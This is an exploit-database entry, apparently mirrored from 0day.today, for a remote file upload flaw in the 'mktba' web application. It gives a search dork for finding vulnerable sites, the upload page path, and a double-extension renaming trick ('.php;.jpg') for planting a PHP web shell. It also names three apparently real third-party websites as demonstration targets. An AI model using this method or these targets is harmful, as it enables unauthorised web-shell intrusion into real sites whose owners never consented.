id: 15894
date: 04/20/2011
title: mktba Remote File Upload Vulnerability
author: Caddy-Dz
cves: 

===========================================================================
# Exploit Title: mktba ==> mktba Remote File Upload Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# Category:: webapps
# E-mail: islam_babia@hotmail.com
# Google dork: intext:"powered by mktba"
# Tested on: [windows vista]
###
>> special thanks to : KedAns-Dz
###
[*] Exploit:

 http://www.site.com/mktba/upload.html

### 
note !: rename your sh3ll ==> sh3ll.php;.jpg
###
[*] Dema Site:

#  http://www.alfisal.com/mktba/upload.html
#  http://nasralssonh.com/mktba/upload.html
#  http://www.qas5.com/mktba/upload.html

=============================================================================



#  0day.today [2023-03-27]  #